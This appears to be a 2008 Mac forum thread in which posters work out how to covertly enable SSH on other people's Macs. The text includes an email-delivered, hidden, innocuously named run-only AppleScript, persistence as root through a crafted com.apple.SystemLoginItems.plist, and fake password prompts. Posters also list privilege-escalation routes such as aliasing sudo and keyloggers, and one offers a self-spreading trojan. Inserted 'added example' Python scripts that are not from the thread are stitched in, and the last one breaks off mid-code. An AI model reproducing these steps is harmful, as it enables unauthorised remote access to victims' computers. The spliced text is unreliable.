lokin
May 18 2008, 04:44 PM
******** EDIT Begins **********
6/25/08 EDIT *IMPORTANT* For Visitors:
QUOTE
The following links to our knowledge base contain further information on this subject, including
Solutions, Discovery, Templates, and more:
ARDAgent exploit &
Com.apple.SystemLoginItems.plist Exploit- Spratt_
******** EDIT Complete **********
So the deal is I'm trying to write a script that will locate preferences--->sharing--->and then select remote login if there are write privileges.
This will be my first attempt at making something that does this so please give me a break.
what language should I use? perl?
what compiler? Xcode?
The program also has to run in the background or be embedded in a file or document of some kind.
Once again I have no experience here so please help all you can.
p.s. please don't write the code and say here's an example, I'll end up copying most of it.
callmenames
May 18 2008, 05:08 PM
QUOTE(callmenames @ May 17 2008, 10:06 AM)

Stop trying to script the graphic interface (it's just a pretty picture that lets you change settings in a preference file), figure out in which files it changes the settings, have your script check whether you have write access to the files and modify the files with your script.
lokin
May 18 2008, 09:54 PM
And I have.
I've forgotten all about preference panes and whatever but as far as I know, so far, is that all preferences are still located in a file called Preferences. No?
And then sharing would be located in that file. And if not located there, there would be something like C++ pointers or shortcuts.
Although I now know that this is not the case.
and don't forget
QUOTE
Once again I have no experience here so please help all you can.
callmenames
May 18 2008, 10:24 PM
Ok, step one is to figure out which file(s) are changed when you click the box in System Preferences to enable remote login. There are a variety of ways to see which files are accessed. From the GUI, try fseventer. From the command line, fseventer, fs_usage, and potentially ps -axww (if filenames are passed to a command which is not too likely in this case) and lsof (if you are quick.) All of the options will work best if you quit everything, have as little running as possible. Get ready to make the change in the GUI, start whatever method you wish to try to see what files are accessed, click in the GUI to make the change (and APPLY if necessary) then quickly switch back to your tool of choice to stop it (unless you are using ps / lsof which don't run continuously.)
callmenames
May 19 2008, 01:31 PM
For instance... restart. Open Terminal and type...
CODE
sudo -s
QUOTE
Password:
PowerBook:~ root#
Your password won't be displayed as you type which is normal, just type it in and press return.
Then open System Preferences, go to sharing. Disable File Sharing if it is on.
Switch back to Terminal. Make the window wide (height does not matter, width does.) Position the Terminal window and the System Preferences window so that you can see the "Start" button to enable File Sharing. In Terminal, type the command 'fs_usage', press return and quickly click the Start button in System Preferences (click once to bring the window forward, click again to start.) Quickly switch back to the Terminal window and type command-period or control-c to cancel fs_usage.
CODE
fs_usage
I ran this on a Tiger 10.4.11 PPC system...
QUOTE
11:18:15.213 lstat private/etc/hostconfig~ 0.000259 W writeconfig
11:18:15.213 statfs private/etc/hostconfig~ 0.000032 writeconfig
11:18:15.213 lstat private/etc/hostconfig~ 0.000018 writeconfig
11:18:15.213 unlink private/etc/hostconfig~ 0.000524 writeconfig
11:18:15.214 lstat [ 2] private/etc/hostconfig~ 0.000094 writeconfig
11:18:15.214 getattrlist private/etc 0.000047 writeconfig
11:18:15.214 getattrlist private/etc 0.000023 writeconfig
11:18:15.214 getattrlist /.vol/234881038/3118/hostconfig 0.000095 writeconfig
11:18:15.214 getattrlist /.vol/234881038/1740430 0.000031 writeconfig
11:18:15.214 getattrlist [ 2] /.vol/234881038/3118/hostconfig~ 0.000050 writeconfig
11:18:15.215 rename /.vol/234881038/3118/hostconfig 0.000529 writeconfig
11:18:15.215 lstat [ 2] private/etc/hostconfig 0.000101 writeconfig
11:18:15.215 stat [ 2] private/etc/hostconfig 0.000048 writeconfig
11:18:15.216 open F=5 private/etc/.dat2253.002 0.000469 writeconfig
11:18:15.216 write F=5 B=0xe3 0.000167 writeconfig
11:18:15.217 WrData[async] D=0x0754e160 B=0x1000 /dev/disk1s10 0.000449 W writeconfig
11:18:15.220 fsync F=5 0.003592 W writeconfig
11:18:15.220 close F=5 0.000064 writeconfig
11:18:15.221 rename private/etc/.dat2253.002 0.000610 writeconfig
11:18:15.221 chmod private/etc/hostconfig 0.000212 writeconfig
The modified file is /etc/hostconfig, here is mine with sharing on.
CODE
cat /etc/hostconfig
QUOTE
AFPSERVER=-YES-
AUTHSERVER=-NO-
AUTOMOUNT=-YES-
CUPS=-AUTOMATIC-
NFSLOCKS=-AUTOMATIC-
NISDOMAIN=-NO-
TIMESYNC=-YES-
QTSSERVER=-NO-
WEBSERVER=-NO-
SMBSERVER=-NO-
SNMPSERVER=-NO-
SPOTLIGHT=-YES-
CRASHREPORTER=-YES-
ARDAGENT=-NO-
... and off
QUOTE
AFPSERVER=-NO-
AUTHSERVER=-NO-
AUTOMOUNT=-YES-
CUPS=-AUTOMATIC-
NFSLOCKS=-AUTOMATIC-
NISDOMAIN=-NO-
TIMESYNC=-YES-
QTSSERVER=-NO-
WEBSERVER=-NO-
SMBSERVER=-NO-
SNMPSERVER=-NO-
SPOTLIGHT=-YES-
CRASHREPORTER=-YES-
ARDAGENT=-NO-
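An added example, not code posted by anyone in this thread: once fs_usage has pointed you at /etc/hostconfig, the next step is to parse the file and diff two snapshots so the script knows which flag the GUI flipped, instead of eyeballing the two listings. The two snapshots below are constructed from the "on" and "off" listings quoted above, so the only expected difference is AFPSERVER. The helper for 10.3-style SSHSERVER flags is an assumption about the key name, not something shown above.

```python
"""Parse hostconfig-style 'NAME=-VALUE-' files and diff two snapshots.

Added example for this thread, not code posted by any participant.
"""
import re

# One flag per line: NAME=-VALUE-, e.g. AFPSERVER=-YES- or CUPS=-AUTOMATIC-
HOSTCONFIG_LINE = re.compile(r'^\s*([A-Z0-9_]+)=-([A-Z]+)-\s*$')


def parse_hostconfig(text):
    """Return {NAME: VALUE} for every flag line; blank and '#' lines are skipped.

    A line that is neither blank, a comment, nor a flag raises ValueError, so a
    mangled file is not silently read as 'everything off'.
    """
    flags = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith('#'):
            continue
        match = HOSTCONFIG_LINE.match(line)
        if match is None:
            raise ValueError(f'line {lineno}: not a NAME=-VALUE- entry: {line!r}')
        flags[match.group(1)] = match.group(2)
    return flags


def diff_hostconfig(before, after):
    """Return {NAME: (old, new)} for flags that changed, appeared or vanished."""
    changed = {}
    for name in sorted(set(before) | set(after)):
        old, new = before.get(name), after.get(name)
        if old != new:
            changed[name] = (old, new)
    return changed


def enabled_services(flags):
    """Names of flags set to -YES- (services the rc scripts start at boot)."""
    return sorted(name for name, value in flags.items() if value == 'YES')


def remote_login_enabled_panther(flags):
    """10.3-style check (assumed key name SSHSERVER); 10.4+ use launchd instead."""
    return flags.get('SSHSERVER') == 'YES'


# Constructed from the two listings quoted in the thread (File Sharing on / off).
SHARING_ON = """\
AFPSERVER=-YES-
AUTHSERVER=-NO-
AUTOMOUNT=-YES-
CUPS=-AUTOMATIC-
NFSLOCKS=-AUTOMATIC-
NISDOMAIN=-NO-
TIMESYNC=-YES-
QTSSERVER=-NO-
WEBSERVER=-NO-
SMBSERVER=-NO-
SNMPSERVER=-NO-
SPOTLIGHT=-YES-
CRASHREPORTER=-YES-
ARDAGENT=-NO-
"""

SHARING_OFF = SHARING_ON.replace('AFPSERVER=-YES-', 'AFPSERVER=-NO-')


if __name__ == '__main__':
    on, off = parse_hostconfig(SHARING_ON), parse_hostconfig(SHARING_OFF)
    print('enabled with sharing on :', enabled_services(on))
    print('changed by the Start button:', diff_hostconfig(off, on))
```

Run it against two copies of the real file (one saved before the click, one after) and the diff tells you the key to rewrite; anything other than a single expected key changing means the GUI touched more than you thought.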
lokin
May 19 2008, 01:48 PM
Ok, well using fseventer I found that just clicking the remote login I get system-->library-->launchDaemons-->ssh.plist
and private-->var-->log-->secure.log and system.log.
When I select it and deselect it a couple times the ssh.plist changes and gets uses next to it so that has to be what I need to change.
The problem I'm having though is that I can't find these items in my terminal.
callmenames
May 19 2008, 01:55 PM
CODE
ls -alo /System/Library/LaunchDaemons/ssh.plist
QUOTE
-rw-r--r-- 1 root wheel - 858 May 14 11:06 /System/Library/LaunchDaemons/ssh.plist
One way to change the file from the command line would be like so...
CODE
launchctl load -w /System/Library/LaunchDaemons/ssh.plist
And to see the contents of that file...
CODE
cat /System/Library/LaunchDaemons/ssh.plist
QUOTE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Disabled</key>
<true/>
<key>Label</key>
<string>com.openssh.sshd</string>
<key>Program</key>
<string>/usr/libexec/sshd-keygen-wrapper</string>
<key>ProgramArguments</key>
<array>
<string>/usr/sbin/sshd</string>
<string>-i</string>
</array>
<key>SessionCreate</key>
<true/>
<key>Sockets</key>
<dict>
<key>Listeners</key>
<dict>
<key>Bonjour</key>
<array>
<string>ssh</string>
<string>sftp-ssh</string>
</array>
<key>SockServiceName</key>
<string>ssh</string>
</dict>
</dict>
<key>StandardErrorPath</key>
<string>/dev/null</string>
<key>inetdCompatibility</key>
<dict>
<key>Wait</key>
<false/>
</dict>
</dict>
</plist>
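An added example, not code from this thread: reading the launchd job plist with plistlib instead of cat, so a script can tell whether Remote Login is currently disabled and what launchd would listen on once it is loaded. SSH_PLIST is the ssh.plist listing quoted above, embedded as bytes so the script runs offline. The with_disabled() helper mirrors what `launchctl load -w` records on 10.4 (the Disabled key in the plist itself, which is why the file showed up as modified in fseventer); 10.5 keeps that override in launchd's own database instead, so on 10.5 editing the plist alone is not the same thing.

```python
"""Read a launchd job plist and report what the Remote Login toggle changes.

Added example for this thread, not code from any participant.
"""
import plistlib

# The ssh.plist quoted in the thread, embedded so the script needs no Mac.
SSH_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Disabled</key>
<true/>
<key>Label</key>
<string>com.openssh.sshd</string>
<key>Program</key>
<string>/usr/libexec/sshd-keygen-wrapper</string>
<key>ProgramArguments</key>
<array>
<string>/usr/sbin/sshd</string>
<string>-i</string>
</array>
<key>SessionCreate</key>
<true/>
<key>Sockets</key>
<dict>
<key>Listeners</key>
<dict>
<key>Bonjour</key>
<array>
<string>ssh</string>
<string>sftp-ssh</string>
</array>
<key>SockServiceName</key>
<string>ssh</string>
</dict>
</dict>
<key>StandardErrorPath</key>
<string>/dev/null</string>
<key>inetdCompatibility</key>
<dict>
<key>Wait</key>
<false/>
</dict>
</dict>
</plist>
"""


def describe_job(data):
    """Summarise a launchd job: label, program, Disabled flag and socket services."""
    job = plistlib.loads(data)
    listeners = job.get('Sockets', {}).get('Listeners', {})
    args = list(job.get('ProgramArguments', []))
    return {
        'label': job['Label'],
        'disabled': bool(job.get('Disabled', False)),
        # Program wins when present; otherwise argv[0] is what launchd execs.
        'program': job.get('Program') or (args[0] if args else None),
        'arguments': args,
        'service': listeners.get('SockServiceName'),
        'bonjour': list(listeners.get('Bonjour', [])),
        # inetd 'nowait' style: launchd accepts, one sshd -i per connection.
        'inetd_nowait': job.get('inetdCompatibility', {}).get('Wait') is False,
    }


def remote_login_enabled(data):
    """True unless the job is marked Disabled (the 10.4 on-disk state)."""
    return not describe_job(data)['disabled']


def with_disabled(data, disabled):
    """Return the plist re-serialised with Disabled set to the given value."""
    job = plistlib.loads(data)
    job['Disabled'] = bool(disabled)
    return plistlib.dumps(job)


if __name__ == '__main__':
    print(describe_job(SSH_PLIST))
    print('enabled after load -w:', remote_login_enabled(with_disabled(SSH_PLIST, False)))
```

A script that wants to know whether it still has work to do should check this key (or, on 10.5, `launchctl list`) rather than re-running load -w blindly.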
lokin
May 20 2008, 02:04 AM
Ok. I get it.
The next problem is that that command has to be run root.
So is there any other way to do this other than make a box pop up that says it's a software update or something and they need to type their password. Once typed (and entered) it will store it as a plain text document and then after
CODE
sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist
it will enter the contents of the password file?
Do I at least have the right idea?
callmenames
May 20 2008, 12:29 PM
There are ways to have things run under the root account without any interaction from a user at all. They vary from one version of OS X to another. I would suggest becoming familiar with the
OS X startup process. One method is used in an example
here.
lokin
May 20 2008, 07:41 PM
So, if I add launchctl load -w /System/Library/LaunchDaemons/ssh.plist to an executable file in startup it will run without needing a password, and then to make it so it doesn't give an error every startup there should also be something saying that if it's already loaded then don't run launchctl load -w /System/Library/LaunchDaemons/ssh.plist.
...yes?
callmenames
May 20 2008, 08:03 PM
Yes, although what constitutes an 'executable file' or command varies depending on which part of the OS X startup process is active. For instance, Login Items are handled in much the way Finder would handle them. If Finder can't run something, it won't work as a Login Item. A command line for instance, won't work while an AppleScript would and it could issue a command line. Similarly, a Startup Item can't be an AppleScript although a shell script will work.
Launchctl is smart enough not to load the service twice (try it and see what it says.)
lokin
May 21 2008, 12:23 AM
Oh sweet. How should I save that file? Does it matter?
and launchctl load -w /System/Library/LaunchDaemons/ssh.plist isn't exactly applescript is it?
I'm getting a bit lost here...
My objective is to be able to send something via e-mail or Ichat and have them open it and execute.
My original idea was that I would send something (e-mail ichat) and it would run invisible with a self execute timer. I've done that before but never invisible to the user.
So the idea here is that it would copy itself to the startup and then the next time they started up their computer it would launch the ssh loader?
callmenames
May 21 2008, 12:44 AM
How should you save which/what file? An AppleScript? Run only/application bundle with no window and no stay open. A shell script? A text file with execute permissions set on the file.
I thought you didn't want anyone to spoon-feed you a script????
CODE
tell application "System Events" to do shell script "launchctl load -w /System/Library/LaunchDaemons/ssh.plist"
To make an AppleScript run "invisible" (which won't actually be necessary in this case because you are going to have it run prior to the user logging in which means they will never see it anyway but it's a good thing to learn so...) read up on "LSUIElement".
Always keep in mind that there is always more than one way of accomplishing the same goal. In this case, you started by looking at the GUI and asked how to script it, I responded by saying look for the preferences files, which led you to launchctl, which requires root, thus you want to get the startup process to run your script because it is run as root and you won't need to have the user enter a password as long as you have write access to a file which is run or used to run other things in the startup process.
An alternative to all of this, would be to just launch sshd from the user's account.
lokin
May 21 2008, 01:50 AM
QUOTE(callmenames @ May 20 2008, 10:44 PM)

CODE
tell application "System Events" to do shell script "launchctl load -w /System/Library/LaunchDaemons/ssh.plist"
Thats what I need help with.
callmenames
May 21 2008, 01:57 AM
You need more help with it than me giving you the whole AppleScript command? :)
Save as a run-only application. Make it invisible (add LSUIElement boolean yes to the info.plist inside the bundle.) Drop it into /Library/Preferences or anywhere where no one will see it. Set the application as a Login Item in /Library/Preferences/com.apple.SystemLoginItems.plist (if you have write access, which happens sometimes :) ) Then it will be run by root at restart.
lokin
May 21 2008, 02:30 AM
You're a quick one to reply...
I was under the impression that Run-Only applications were more of a parental control kind of thing. And how would you save a text document as run only? Extension?
callmenames
May 21 2008, 02:44 AM
Inside the Applications folder should be a folder named "AppleScript". Within that folder is a program named Script Editor. Run it, paste in the command line. Save as Application Bundle, check Run Only, leave Startup Screen unchecked and name it something innocuous like "AdjustGamma". Then open the bundle (control-click on it once, select "Show package contents") and edit the info.plist file. If you have Xcode or Developer Tools installed you can use Property List Editor, otherwise use TextEdit.
QUOTE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleAllowMixedLocalizations</key>
<true/>
<key>CFBundleDevelopmentRegion</key>
<string>English</string>
<key>CFBundleExecutable</key>
<string>applet</string>
<key>CFBundleIconFile</key>
<string>applet</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>GammaAdjust</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleSignature</key>
<string>aplt</string>
<key>LSRequiresCarbon</key>
<true/>
<key>WindowState</key>
<dict>
<key>name</key>
<string>ScriptWindowState</string>
<key>positionOfDivider</key>
<real>274</real>
<key>savedFrame</key>
<string>39 473 439 460 0 0 1280 938 </string>
<key>selectedTabView</key>
<string>result</string>
</dict>
</dict>
</plist>
QUOTE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleAllowMixedLocalizations</key>
<true/>
<key>CFBundleDevelopmentRegion</key>
<string>English</string>
<key>CFBundleExecutable</key>
<string>applet</string>
<key>CFBundleIconFile</key>
<string>applet</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>GammaAdjust</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleSignature</key>
<string>aplt</string>
<key>LSRequiresCarbon</key>
<true/>
<key>LSUIElement</key>
<true/>
</dict>
</plist>
Then test it!
:)
lokin
May 21 2008, 02:59 AM
So close.... gotta love a syntax error
A identifier can’t go after this identifier. launchctl load
any ideas? It's all set up right.
Name is LoginSettup, it's an application bundle, and Run Only is selected.
callmenames
May 21 2008, 03:02 AM
lokin
May 21 2008, 03:20 AM
Hmm well I did all that it was found in my login items I selected it. Restarted my computer and remote login wasn't loaded.
callmenames
May 21 2008, 11:06 AM
What does 'found in my log in items' mean?
callmenames
May 21 2008, 05:45 PM
Do you have write access to /Library/Preferences/com.apple.SystemLoginItems.plist ? (Which is where the entry to make the run-only script a Login Item should be placed.)
lokin
May 21 2008, 07:05 PM
QUOTE
What does 'found in my log in items' mean?
system preferences > accounts > login items > AVPN.Agent
I can't find com.apple.SystemLoginItems.plist
am I simply looking it over?
CODE
com.apple.headerdoc.exampletocteplate.html
com.apple.headerDoc2HTML.config
SystemConfiguration
com.apple.ByteRangeLocking.plist
com.apple.dockfixup.plist
com.apple.xgrid.controller.plist
com.apple.xgrid.agent.plist
com.apple.pcast_integration.plist
com.apple.Catapult.plist
DirectoryService
com.apple.security.systemidentities.plist
com.apple.CoreRAIDServer.cfdb
com.apple.iLife08.plist
com.apple.SetupAssistant.plist
com.apple.HIToolbox.plist
com.apple.audio.SystemSettings.plist
com.apple.ARDAgent.plist
com.apple.RemoteManagement.plist
com.apple.RemoteManagement.launchd
com.apple.loginwindow.plist
com.apple.BezelServices.plist
com.apple.SoftwareUpdate.plist
com.apple.Bluetooth.plist
com.apple.java.util.prefs.plist
com.apple.windowserver.plist
com.apple.AppleFileServer.plist
com.apple.alf.plist
com.apple.driver.AppleIRController.plist
com.apple.virtualMemory.plist
com.apple.iPod.plist
com.apple.TimeMachine.plist
com.apple.keyboardtype.plist
com.stuffit.agreement.plist
Adobe Systems
com.adobe.AdobePDFSettings.plist
com.apple.AppleShareClient.plist
com.apple.driver.AppleUSBDisplays.plist
FLEXnet Publisher
com.apple.audio.DeviceSettings.plist
com.apple.mediaio.DeviceSettings.plist
callmenames
May 21 2008, 07:31 PM
The Login Items shown in System Preferences are run not as root but as the user from whose account they are loaded. No, you aren't overlooking com.apple.SystemLoginItems.plist - it just isn't there yet. Create it...
QUOTE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AutoLaunchedApplicationDictionary</key>
<array>
<dict>
<key>Path</key>
<string>/Library/Preferences/Your_run_only_AppleScript</string>
</dict>
</array>
</dict>
</plist>
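An added example, not code from this thread, covering both the Info.plist edit described a few posts up and the com.apple.SystemLoginItems.plist file created here: an audit that reads the AutoLaunchedApplicationDictionary entries, checks whether each Path exists, and flags any whose bundle Info.plist sets LSUIElement (a background app with no Dock icon or menu bar, exactly what the thread is building). Since a login-items file like this runs its entries as root, an unexpected hidden entry here is worth a look. The fixture (bundle name AdjustGamma, a dangling second entry, the temporary directory layout) is constructed for the example so it runs on any machine.

```python
"""Audit a com.apple.SystemLoginItems.plist for hidden or missing targets.

Added example for this thread, not code from any participant.
"""
import os
import plistlib
import tempfile


def login_item_paths(data):
    """Return the Path of every entry under AutoLaunchedApplicationDictionary."""
    plist = plistlib.loads(data)
    entries = plist.get('AutoLaunchedApplicationDictionary', [])
    return [entry['Path'] for entry in entries if isinstance(entry, dict) and 'Path' in entry]


def is_ui_element(bundle_path):
    """True if the bundle's Info.plist sets LSUIElement.

    Accepts the boolean <true/> form and the older string "1" form.  A path
    that is not a bundle (no Contents/Info.plist) is simply not hidden.
    """
    info_path = os.path.join(bundle_path, 'Contents', 'Info.plist')
    try:
        with open(info_path, 'rb') as fh:
            info = plistlib.load(fh)
    except (OSError, plistlib.InvalidFileException):
        return False
    value = info.get('LSUIElement', False)
    return value is True or str(value).strip().lower() in ('1', 'true', 'yes')


def audit_login_items(plist_path):
    """One finding per login item: the path, whether it exists, whether hidden."""
    with open(plist_path, 'rb') as fh:
        data = fh.read()
    return [
        {'path': path, 'exists': os.path.exists(path), 'hidden': is_ui_element(path)}
        for path in login_item_paths(data)
    ]


def build_fixture(root):
    """Constructed fixture: a hidden applet bundle plus a login-items plist that
    references it and one path that no longer exists.  Returns the plist path."""
    prefs = os.path.join(root, 'Library', 'Preferences')
    bundle = os.path.join(prefs, 'AdjustGamma')
    os.makedirs(os.path.join(bundle, 'Contents'))
    with open(os.path.join(bundle, 'Contents', 'Info.plist'), 'wb') as fh:
        plistlib.dump({'CFBundleExecutable': 'applet',
                       'CFBundleName': 'GammaAdjust',
                       'LSUIElement': True}, fh)
    plist_path = os.path.join(prefs, 'com.apple.SystemLoginItems.plist')
    with open(plist_path, 'wb') as fh:
        plistlib.dump({'AutoLaunchedApplicationDictionary': [
            {'Path': bundle},
            {'Path': os.path.join(root, 'Users', 'someone', 'Desktop', 'Gone')},
        ]}, fh)
    return plist_path


def run_demo():
    """Build the fixture in a temp dir and return the findings for it."""
    with tempfile.TemporaryDirectory() as root:
        return audit_login_items(build_fixture(root))


if __name__ == '__main__':
    for finding in run_demo():
        print(finding)
```

On a real box point audit_login_items() at /Library/Preferences/com.apple.SystemLoginItems.plist; the same two checks apply to ~/Library/Preferences/loginwindow.plist entries, which run as the user rather than root.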
lokin
May 21 2008, 07:46 PM
Ok, made it in TextEdit, added the name of my script, saved it as com.apple.SystemLoginItems.plist in Preferences.
It says the document com.apple.SystemLoginItems.plist cannot be opened.
callmenames
May 21 2008, 07:58 PM
What says that?
lokin
May 21 2008, 09:03 PM
system preferences.
callmenames
May 21 2008, 09:37 PM
What can I do to convince you to stay out of System Preferences? :)
Seriously, the Login Items that you set in System Preferences will NOT run as root, they run as the user! This is not what you want.
If you have already placed the com.apple.SystemLoginItems.plist file in /Library/Preferences and if that file specifies the path to your run only AppleScript bundle... then you are good to go. Just make sure SSH is off and then restart and check SSH again.
lokin
May 21 2008, 10:44 PM
Lol, ya I know you've pointed that out.
It still isn't working.
lokin
May 21 2008, 10:47 PM
And everything as far as I can tell is in place.(except I still think that because com.apple.SystemLoginItems.plist isn't opening is the problem)
callmenames
May 21 2008, 11:13 PM
What does "It still isn't working" mean? When you restart, do you see the name of your script on the menubar just prior to or just after login? Do you get any error messages in the log files regarding the script or com.apple.SystemLoginItems.plist ? What do you mean when you say that it won't open - what are you trying to open it with which tells you that it won't open?
lokin
May 21 2008, 11:47 PM
When I simply try and open com.apple.SystemLoginItems.plist from the finder it says
The document “ com.apple.SystemLoginItems.plist” could not be opened.
QUOTE
When you restart, do you see the name of your script on the menubar just prior to or just after login
no.
And I can't find any errors in the log messages.
callmenames
May 22 2008, 12:03 AM
And if you run Terminal and enter
ssh 127.0.0.1
What happens?
By the way, to open the plist file, control-click and "Open with..." TextEdit.
lokin
May 22 2008, 01:27 AM
Well if I ssh myself then it does nothing, considering that it hasn't worked yet. But if I manually start remote login through launchctl load or System Preferences then when I ssh myself I'm prompted for the password, type it in and it works like any other ssh.
I made a quick edit to the XML in the plist because I thought I had found the error.
Does the apple script have to be located in /Library/Preferences?
CODE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AutoLaunchedApplicationDictionary</key>
<array>
<dict>
<key>Path</key>
<string>/Library/Preferences/RLoginSetup</string>
</dict>
</array>
</dict>
</plist>
to
CODE
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AutoLaunchedApplicationDictionary</key>
<array>
<dict>
<key>Path</key>
<string>username/Desktop/Projects/RemoteLogin/RLoginSetup</string>
</dict>
</array>
</dict>
</plist>
callmenames
May 22 2008, 01:36 AM
No, the AppleScript run-only application bundle can be pretty much anywhere _as long as you put the correct path in the plist_. Which incidentally would be...
/Users/username/Desktop/Projects/RemoteLogin/RLoginSetup
And you can't use ~ because it's going to be run by root and root's home is /var/root
lokin
May 22 2008, 04:04 AM
Well it all seems to be in order, I'll play around with it a bit to see if I can get it to work.
Squid
May 22 2008, 04:04 PM
Hehe, I remember writing an applescript that did this a while ago. I wonder if I still have it...
lokin
May 23 2008, 02:28 AM
Was it similar?
My main problem is that once I have it working then I need it to make and save the plist automatically...
callmenames
May 23 2008, 10:34 AM
You could place the file inside your application bundle and then copy it.
Or create it using AppleScript.
CODE
try
set thefile to POSIX file "/Library/Preferences/com.apple.SystemLoginItems.plist"
open for access thefile with write permission
set eof of thefile to 0
write "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict>
<key>AutoLaunchedApplicationDictionary</key>
<array>
<dict>
<key>Path</key>
<string>/Library/Preferences/RLoginSetup99</string>
</dict>
</array>
</dict>
</plist>" to thefile
close access thefile
end try
Or create the file with a shell command.
CODE
echo '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AutoLaunchedApplicationDictionary</key>
<array>
<dict>
<key>Path</key>
<string>/Library/Preferences/RLoginSetup</string>
</dict>
</array>
</dict>
</plist>' > /Library/Preferences/com.apple.SystemLoginItems.plist
Squid
May 24 2008, 04:07 AM
QUOTE(lokin @ May 23 2008, 03:28 AM)

Was it similar?
My main problem is that once I have it working then I need it to make and save the plist automatically...
If I remember, I never really completed it. So I had a crappy dialog appear and ask for a password, which it would store in an applescript variable. I planned on improving the way I retrieved that password, but never got around to it. After that, I had it run the shell command callmenames mentioned, sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist. It would use the stored password when called for. After it enabled SSH, I would connect to the other computer and retrieve the password.
I think that's how I did it...
Talking about this makes me want to rewrite my script.
Oktane
May 24 2008, 09:21 AM
I think I'm missing pieces here, can you explain in detail what you need to do so that I can help. I would like to contribute the shell of the Trojan I made a little while ago. It is an Xcode project of AppleScript and it looks like an image or whatever you want, then runs behind the scenes (if you know what I mean). It can email itself with your address book if you include that aspect.
I under stand how this works:
CODE
tell application "System Events" to do shell script "launchctl load -w /System/Library/LaunchDaemons/ssh.plist"
I also understand that we need root to make it run so we are going to insert it into the start up items, just explain what needs to go where and I'll try to help you out. If you want the help I'll post how to make that "shell of a trojan."
callmenames
May 24 2008, 11:46 AM
GOAL: Enable Remote Login without user interaction
- Must have root privileges to enable the Remote Login / ssh service in its standard implementation by Apple.
- root privileges can be gained in a variety of ways such as: through weak permissions on /Library/Preferences/com.apple.SystemLoginItems.plist; through weak permissions on /Library/StartupItems (more likely on pre-Tiger systems); waiting for sudo to be used and then piggy-backing during sudo's allotted timestamp period (usually 5 minutes, check /etc/sudoers); capturing passwords when sudo is invoked (for instance by aliasing sudo) and then testing the sudo access level gained from the password until a sufficiently privileged account is available; various public exploits depending on OS version; brute-force sudo or any running service; trojan-horse an app or installer which requires superuser or root privileges (and which is likely to be used); keylogger (obviously one which does not require root privileges to install); Single-user Mode (may require Open-Firmware / EFI reset which may require physical access or at the very least an account sufficiently privileged to sudo nvram -p); Target Disk Mode (requires physical access, FireWire or SCSI on older Macs); yank the hard drive and install it in another Mac or an external case (requires physical access); there is always a way.
- Alternately, implement a different SSH or Telnet service (or use custom configuration to use Apple's) under the current user's account.
- If changes are to be made programmatically then obviously a program is needed. Type of program depends largely on method. If using com.apple.SystemLoginItems.plist, an AppleScript compiled as a run-only bundle will do the job.
QUOTE
on enable_ssh()
tell application "System Events"
try
do shell script "launchctl load -w /System/Library/LaunchDaemons/ssh.plist 2>/dev/null"
end try
end tell
end enable_ssh
enable_ssh
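An added example, not code from this thread: the first two root-privilege routes listed above are both "a file or directory the startup process trusts is writable by someone other than root", so the practical check from the defender's side (or from a script asking "do I have write access?") is the permission bits on those paths. This audit reports owner, mode, group- and world-writability and whether the caller can write, for the paths named in the thread. The fixture with deliberately mixed permissions is constructed in a temporary directory so it runs anywhere; on a real system pass root='/' and expect_owner=0.

```python
"""Check the persistence paths the thread relies on for weak permissions.

Added example for this thread, not code from any participant.
"""
import os
import stat
import tempfile

# Paths named in the thread, relative to the filesystem root.
PERSISTENCE_PATHS = (
    'Library/Preferences/com.apple.SystemLoginItems.plist',
    'Library/StartupItems',
    'Library/LaunchDaemons',
    'System/Library/LaunchDaemons/ssh.plist',
)


def inspect_path(path, expect_owner=None):
    """Return a finding dict for path, or None if it does not exist.

    'weak' is set when the group or world write bit is on, or (if
    expect_owner is given) when the owner is not the expected uid.  Either
    lets a non-root account change what root runs at boot.
    """
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return None
    mode = st.st_mode
    group_w = bool(mode & stat.S_IWGRP)
    world_w = bool(mode & stat.S_IWOTH)
    bad_owner = expect_owner is not None and st.st_uid != expect_owner
    return {
        'path': path,
        'type': 'dir' if stat.S_ISDIR(mode) else 'file',
        'symlink': stat.S_ISLNK(mode),
        'owner_uid': st.st_uid,
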